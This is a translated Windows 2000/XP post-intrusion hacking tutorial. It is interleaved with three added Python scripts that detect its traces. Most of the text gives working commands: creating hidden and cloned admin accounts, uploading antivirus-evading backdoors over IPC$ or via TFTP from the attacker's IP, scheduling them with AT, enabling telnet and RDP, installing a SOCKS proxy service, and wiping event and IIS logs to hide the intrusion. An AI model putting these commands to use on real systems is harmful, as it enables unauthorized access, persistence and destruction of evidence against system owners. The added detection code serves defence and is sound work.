Work after an intrusion into Windows


By heiyeluren

We know that intruding into a system is sometimes fairly simple, but doing the follow-up work well is not that easy. As the saying goes, conquering a country is easy but holding it is hard; the same applies here, so the work done after intruding into a system matters and must be done carefully. From that angle, this article offers some pointers to those who have already obtained permissions on a system.

Note: unless stated otherwise, "the system" in this article means Windows 2000 or Windows XP.

1. Obtain permissions (beyond the scope of this article; we only discuss what to do after the intrusion)

2. Create a super-privileged user
(1) Create a user:
For example:
net user system$ hacker /add
net localgroup administrators system$ /add
Note: the two commands above create a user named "system$" with the password "hacker" and add it to the Administrators group.
(2) Clone a super user:
You can use the CA tool to clone a super user, provided you have an account and password with administrator privileges on the target system.
ca \\ip administrator password iusr_name password
Description: administrator / password: an administrator account and its password.
iusr_name / password: an existing low-privilege user of the system and its password; this is the account that becomes the clone.
CCA: the tool for checking the clone result.
cca \\ip user password
user: the cloned account
password: its password
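From the defender's side, both tricks in this section leave a checkable trace. Below is an added example, not code from the original article, that performs the comparison a clone-check tool such as the article's CCA makes (assumption about that tool's internals): the clone technique copies the binary "F" value of the built-in Administrator's subkey (RID 500, subkey 000001F4 under HKLM\SAM\SAM\Domains\Account\Users) onto another account's subkey, so any other RID carrying a byte-identical F value is a clone. It also lists Administrators members whose name ends in "$", since such names are normally computer accounts and `net user` does not display them. The SAM snapshot and group listing are constructed sample data; on a real host they would have to be read with SYSTEM privileges.

```python
"""Detect cloned-administrator accounts and '$'-suffixed hidden admins.

Added example (not from the original article). The F values and group
membership below are constructed; they are not a real SAM dump.
"""

ADMIN_RID = 0x1F4  # built-in Administrator, SAM subkey 000001F4


def find_cloned_rids(f_values):
    """Return RIDs whose F value is byte-identical to RID 500's.

    f_values: {rid (int): bytes}. The clone tools copy Administrator's F
    record onto the victim account, so an exact match on any other RID is
    the signature of a clone.
    """
    reference = f_values.get(ADMIN_RID)
    if reference is None:
        return []
    return sorted(rid for rid, blob in f_values.items()
                  if rid != ADMIN_RID and blob == reference)


def find_hidden_admins(admin_members, computer_names=()):
    """Flag Administrators members ending in '$' that are not computer accounts.

    computer_names: names of machines whose accounts legitimately end in '$'.
    """
    known = {c.upper().rstrip("$") for c in computer_names}
    return sorted(m for m in admin_members
                  if m.endswith("$") and m.upper().rstrip("$") not in known)


# Constructed sample data (not captured from a real system).
SAMPLE_F_VALUES = {
    0x1F4: bytes.fromhex("02000100000000001c9c2d0a3b1dc601"),  # Administrator
    0x1F5: bytes.fromhex("02000100000000000000000000000000"),  # Guest
    0x3E8: bytes.fromhex("02000100000000001c9c2d0a3b1dc601"),  # cloned IUSR
    0x3E9: bytes.fromhex("0200010000000000a1b2c3d4e5f60718"),  # ordinary user
}
SAMPLE_ADMINS = ["Administrator", "system$", "WORKSTATION01$"]
SAMPLE_COMPUTERS = ("WORKSTATION01",)


def audit(f_values=SAMPLE_F_VALUES, admins=SAMPLE_ADMINS,
          computers=SAMPLE_COMPUTERS):
    """Run both checks and return the findings as a dict."""
    return {
        "cloned_rids": find_cloned_rids(f_values),
        "hidden_admins": find_hidden_admins(admins, computers),
    }


if __name__ == "__main__":
    result = audit()
    for rid in result["cloned_rids"]:
        print(f"RID {rid} (0x{rid:X}) carries Administrator's F value: likely clone")
    for name in result["hidden_admins"]:
        print(f"'{name}' is a $-suffixed member of Administrators: check it")
```

The RID-500 comparison is the reliable part: a renamed or hidden account still has its own RID, and only the copied F record betrays the clone. The "$" check is a heuristic and should be read alongside the machine inventory.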

3. Create a backdoor
(1) Upload a backdoor program (there are many methods; only two common ones are covered):
Upload a backdoor such as wollf or winshell. It is advisable to pack the backdoor with a packer such as UPX or ASPack so that it is less likely to be detected and removed by antivirus software.

How to upload a backdoor:
(A) Using IPC$: first establish a connection with the target:
net use \\ip\ipc$ "password" /user:"username"
Once the connection is established, copy the backdoor across:
copy C:\hack\wollf.exe \\ip\admin$
Note: this copies the wollf backdoor from your drive C to the target's system root (X:\winnt or the Windows directory), which is what the admin$ share maps to.
(B) Using TFTP: the premise is that you already have a shell on the target, for example through telnet.
From that shell you can pull the backdoor from your machine onto the target:
tftp -i yourIP get wollf.exe
Note: this downloads wollf.exe from your machine into the target's system directory. It requires that the target does not block TFTP and that your machine has an independent (public) IP address; a machine behind a LAN will not work. Run the tftpd32 tool on your own machine: it listens on port 69 and serves the file when the target connects.

(2) Run the backdoor:
(A) Use the AT command:
First obtain the time of the target system: net time \\ip
AT syntax: at \\ip <time> <path of the backdoor on the target system>
Example: at \\192.168.0.1 <time> C:\winnt\system32\wollf.exe
Note: the AT command requires an IPC$ connection already established with the target. After obtaining the target's system time, schedule the backdoor to run a few minutes later. Besides the AT command, the tool "xec.exe" can be used for the same purpose.
(B) Use "Streamer" to copy and run backdoors; refer to Streamer's help file.
(C) Run the backdoor directly:
If you have already logged on to the target system, for example through telnet, you can simply run the backdoor from there.
If the target does not have telnet enabled, we can enable it.
How to enable telnet on the target:
You can use the opentelnet.exe tool, provided you have administrator permission on the target system and IPC$ is enabled.
The command is as follows:
opentelnet \\ip username password ntlmauthor telnetport
Note: \\ip: target IP; username: user name; password: password;
ntlmauthor: NTLM authentication mode; telnetport: port.
NTLM authentication modes: 0: NTLM authentication is not used; 1: NTLM authentication is tried first and, if it fails, password authentication is used; 2: only NTLM authentication is used.
After it succeeds, you can log on to the target with telnet to that IP and port, or with nc -vv.

4. Act as a proxy server
I don't need to explain why you would want a proxy; let's talk about how to set one up.
skserver.exe is a SOCKS proxy tool written by Snake. It makes a good stepping stone!
First write a batch file with the following content:
@echo **********************************************
@echo Batch installer for the socks proxy
@echo by heiyeluren
@echo cqsn --- http://www.hackerxfiles.com/
@echo **********************************************
@pause
@skserver -install
@echo install... succeed!
@skserver -config port 1983
@echo set port to 1983... succeed!
@skserver -config starttype 2
@echo set starttype to autostart... succeed!
@net start skserver
@echo start service... succeed!
@echo OK... install end!
@pause
@exit

You can change the batch file as needed. The name skserver can be changed to the backdoor's name, but "net start skserver" below cannot be changed, because that is the tool's service name. You can also change it to one of your own. After transferring skserver.exe to the target system, run the batch file; you can then connect to the proxy on the target's port 1983. You can use SocksCap to go through the proxy. Chain through 254 layers and see who can find you ~~~

5. Open the terminal service
If the target runs Windows 2000 Server or above, you can open its terminal service (port 3389) for better remote control. Everyone says 3389 zombies are the best; now let's try it! ~~

(1) Manually open the terminal:
After entering the target system, enter the following at the command prompt (assuming the system is under C:\WINNT):
echo [Components] > C:\3389
echo TSEnable = on >> C:\3389
sysocmgr /i:C:\winnt\inf\sysoc.inf /u:C:\3389 /q
(You can add the /r parameter to suppress the automatic restart and restart later yourself.) Alternatively, write the following file and upload it to the target system:
[Components]
TSEnable = on
Save it as a file named 3389 and run sysocmgr /i:C:\winnt\inf\sysoc.inf /u:C:\3389 /q. After the target restarts you have a 3389 zombie, and you can connect to it through "Remote Desktop Connection" and control it from Windows.

(2) Using a tool:
A tool called dixyxs.exe can open the target's terminal service.
Upload the tool to the target system and run it: dixyxs.exe. After a while the zombie restarts automatically, and the terminal service is available after the restart.
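Everything in sections 3 to 5 leaves a footprint that can be baselined: a backdoor listening for its controller, the skserver proxy on port 1983, Terminal Services on port 3389, and the TermService and skserver services set to start automatically. The following added example (not code from the original article) diffs a host's listening sockets and auto-start services against a baseline recorded when the host was built. The netstat output and service list are constructed samples; on a real host they would come from "netstat -an" and the service control manager (assumption).

```python
"""Baseline diff for listening ports and auto-start services on a Windows host.

Added example; not code from the original article. Sample data below is
constructed, not captured from a real system.
"""
import re

# Matches a "netstat -an" line such as:
#   TCP    0.0.0.0:1983           0.0.0.0:0              LISTENING
_NETSTAT_LINE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$", re.IGNORECASE
)


def parse_listeners(netstat_output):
    """Return the set of (proto, port) sockets that accept connections.

    TCP sockets count only in LISTENING state; UDP lines carry no state
    and every bound UDP socket is reported.
    """
    listeners = set()
    for line in netstat_output.splitlines():
        m = _NETSTAT_LINE.match(line)
        if not m:
            continue  # header, blank line, or a different format
        proto, _local, port, _foreign, state = m.groups()
        proto = proto.upper()
        if proto == "TCP" and (state or "").upper() != "LISTENING":
            continue
        listeners.add((proto, int(port)))
    return listeners


def unexpected_listeners(netstat_output, baseline):
    """Sockets not in the baseline set of (proto, port) recorded at build time."""
    return sorted(parse_listeners(netstat_output) - set(baseline))


def new_auto_services(services, baseline_names):
    """Auto-start services whose name is not in the baseline (case-insensitive)."""
    known = {n.lower() for n in baseline_names}
    return sorted(
        (s["name"] for s in services
         if s["start"].lower() == "auto" and s["name"].lower() not in known),
        key=str.lower,
    )


# Constructed sample data.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1983           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.168.0.1:139        192.168.0.7:1042       ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""
SAMPLE_BASELINE_PORTS = {("TCP", 80), ("TCP", 135), ("TCP", 139),
                         ("TCP", 445), ("UDP", 445)}
SAMPLE_SERVICES = [
    {"name": "Eventlog", "start": "auto"},
    {"name": "W3SVC", "start": "auto"},
    {"name": "skserver", "start": "auto"},
    {"name": "TermService", "start": "auto"},
    {"name": "TlntSvr", "start": "manual"},
]
SAMPLE_BASELINE_SERVICES = {"Eventlog", "W3SVC", "TlntSvr"}


def host_report(netstat_output=SAMPLE_NETSTAT, services=SAMPLE_SERVICES):
    """Return the unexpected listeners and new auto-start services."""
    return {
        "ports": unexpected_listeners(netstat_output, SAMPLE_BASELINE_PORTS),
        "services": new_auto_services(services, SAMPLE_BASELINE_SERVICES),
    }


if __name__ == "__main__":
    report = host_report()
    for proto, port in report["ports"]:
        print(f"unexpected listener: {proto}/{port}")
    for name in report["services"]:
        print(f"new auto-start service: {name}")
```

A baseline diff is deliberately dumb: it does not know what port 1983 is, only that the host was not listening on it before, which is exactly why the "change the port" advice in section 4 does not help an attacker against it.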

6. Clear logs
After all that is done, you don't want to be caught three minutes later, do you? The logs should be cleared.
Windows logs include WWW logs, FTP logs, DNS logs, security logs, system logs and application logs.

(1) Manually clear logs:
Some logs must be deleted, such as the web and FTP logs.

Default log file locations:
Default location of the application, security, system and DNS logs: %SystemRoot%\system32\config. The default maximum file size (in KB) can be changed by the administrator.
Security log file: %SystemRoot%\system32\config\SecEvent.Evt
System log file: %SystemRoot%\system32\config\SysEvent.Evt
Application log file: %SystemRoot%\system32\config\AppEvent.Evt
Default location of the IIS FTP logs: %SystemRoot%\system32\LogFiles\MSFTPSVC1\. One log file is generated per day by default.
Default location of the IIS WWW logs: %SystemRoot%\system32\LogFiles\W3SVC1\. One log file is generated per day by default.
Default location of the Task Scheduler service log: %SystemRoot%\SchedLgU.Txt

We can delete a service's logs after stopping the service:
Stop the service: net stop w3svc
Then several logs can be deleted. The WWW service logs are in C:\winnt\system32\LogFiles\W3SVC1; the FTP service logs are in C:\winnt\system32\LogFiles\MSFTPSVC1. Then use DEL:
del C:\winnt\system32\LogFiles\W3SVC1\*.* /q
del C:\winnt\system32\LogFiles\MSFTPSVC1\*.* /q
Then the scheduler log: stop the service with net stop "Task Scheduler"
and then del C:\winnt\SchedLgU.Txt /q ~

The security, system and application logs belong to the Event Log service (eventlog), which cannot be stopped. So if you want to delete these logs manually you have to use a rather slow method:
Open "Event Viewer" under "Administrative Tools" in the "Control Panel". The "Action" menu has an item "Connect to another computer"; click it (as shown in the figure), enter the IP address of the remote computer and wait a while (depending on the network speed between the two sides). The remote computer's Event Viewer then opens: select the remote computer's "Security" log, right-click, choose Properties and click "Clear log" in the Properties dialog. OK! Security log cleared! Clear the "System" and "Application" logs in the same way!

(2) Use tools to delete logs
Using tools to delete the logs is much easier!
(A) To delete the WWW and FTP logs of the IIS service, you can use the cleaniislog.exe tool.
Usage:
First connect through the IPC$ pipe: net use \\ip\ipc$ "password" /user:""
Then use the following command:
cleaniislog <logfile>|<.> <cleanip>|<.>
<logfile>: the log file to process; "." means all log files (note: processing all log files takes a long time).
<cleanip>: the IP address whose records are cleared; "." means all IP records are cleared (not recommended).
Example: cleaniislog . 127.0.0.1
A. You can clear the connection records of a specified IP address and keep the records of other IP addresses.
B. After clearing, cleaniislog removes the record of its own run from the system log.
cleaniislog can only be run locally and requires Administrators permission.

(B) To delete the security, system and application logs you can use the elsave.exe tool.
Usage:
First connect through the IPC$ pipe: net use \\ip\ipc$ "password" /user:""
Clear the application log of the target system:
elsave -s \\ip -l "application" -C
Clear the system log of the target system:
elsave -s \\ip -l "system" -C
Clear the security log of the target system:
elsave -s \\ip -l "security" -C

(C) logkiller.exe can delete all of the target's logs, including the application, security and system logs, the IIS FTP service log, the IIS SMTP service log, the IIS WWW service log and the scheduled task log.
Usage: upload the tool to the target system and run it directly.
Example: C:\winnt\system32\logkiller.exe
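Neither of the two deletion methods above is invisible to a defender who looks. IIS writes one W3C log per day named exYYMMDD.log, so deleting a day's file leaves a hole in an otherwise continuous sequence; and clearing a Windows 2000/XP Security log does not leave it empty, because the fresh log starts with event ID 517, "The audit log was cleared" (1102 on Vista and later), whether the clearing was done with elsave or with the Event Viewer "Clear log" button. The following added example, not code from the original article, implements both checks over constructed sample data; the event records are a minimal dict stand-in for exported .evt entries (assumption).

```python
"""Detect the two kinds of log tampering described in section 6.

Added example; not code from the original article. File names and event
records below are constructed samples.
"""
from datetime import date, timedelta
import re

_IIS_LOG_NAME = re.compile(r"^ex(\d{2})(\d{2})(\d{2})\.log$", re.IGNORECASE)
AUDIT_LOG_CLEARED = 517   # Windows 2000/XP Security log; 1102 on Vista and later


def iis_log_dates(filenames):
    """Dates covered by the daily log files present in a W3SVC/MSFTPSVC directory."""
    found = set()
    for name in filenames:
        m = _IIS_LOG_NAME.match(name)
        if m:
            yy, mm, dd = (int(x) for x in m.groups())
            found.add(date(2000 + yy, mm, dd))  # two-digit year, assumed 20xx
    return found


def missing_iis_days(filenames):
    """ISO dates with no log between the earliest and latest file present.

    A site with daily traffic creates a file every day, so an interior gap
    is either deletion or an outage. A quiet site can legitimately lack a
    day, which is why only gaps inside the observed range are reported.
    """
    present = iis_log_dates(filenames)
    if not present:
        return []
    day, last = min(present), max(present)
    gaps = []
    while day <= last:
        if day not in present:
            gaps.append(day.isoformat())
        day += timedelta(days=1)
    return gaps


def log_cleared_events(records):
    """Records that mark a clearing of the Security log.

    records: iterable of dicts with keys 'log', 'event_id', 'time', 'user'.
    """
    return [r for r in records
            if r["log"].lower() == "security" and r["event_id"] == AUDIT_LOG_CLEARED]


# Constructed sample data.
SAMPLE_W3SVC_DIR = ["ex030401.log", "ex030402.log", "ex030404.log",
                    "ex030405.log", "Thumbs.db"]
SAMPLE_EVENT_LOG = [
    {"log": "Security", "event_id": 517, "time": "2003-04-03 01:15:41", "user": "Administrator"},
    {"log": "Security", "event_id": 528, "time": "2003-04-03 01:16:02", "user": "system$"},
    {"log": "System", "event_id": 6005, "time": "2003-04-03 01:20:00", "user": "N/A"},
]


def tamper_report(filenames=SAMPLE_W3SVC_DIR, records=SAMPLE_EVENT_LOG):
    """Run both checks and return the findings as a dict."""
    return {
        "missing_iis_days": missing_iis_days(filenames),
        "log_cleared": log_cleared_events(records),
    }


if __name__ == "__main__":
    report = tamper_report()
    for day in report["missing_iis_days"]:
        print(f"no IIS log for {day}: deleted or outage?")
    for event in report["log_cleared"]:
        print(f"Security log cleared at {event['time']} by {event['user']}")
```

The 517 record also names the account that did the clearing, which is why the checks in this example pair well with the account audit earlier in the article: a "$" account appearing as the clearing user is a strong signal on its own. Shipping the event logs and IIS logs to another host as they are written removes the value of local deletion altogether.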

7. What follows

Having said all this, the work to be done after a system intrusion is more or less complete. Of course you can do other things as well, rather than following the pattern above, but the above is a fairly common pattern. For example, you can also set up remote-control software such as VNC, or turn the zombie into your own FTP server. The premise is always that you pay attention to security and leave no unnecessary traces.
I don't know whether you have noticed one thing: we use all kinds of tools to complete our tasks. We cannot do without them, but if we rely on tools too much our skills stop improving. So I hope you will avoid tools where you can; if something can be done by hand, try to do it manually. That way you will "know it, and know why", and isn't that better?
What I talk about in this article may be old stuff that many experts won't want to read. Heh, I think it is pitched at the beginner level, and it should help you avoid being confused by these small issues.

Statement: the above is purely a technical discussion. If any organization or individual violates national law by using the above methods, they will be subject to criminal sanctions, and none of their actions have anything to do with the author.
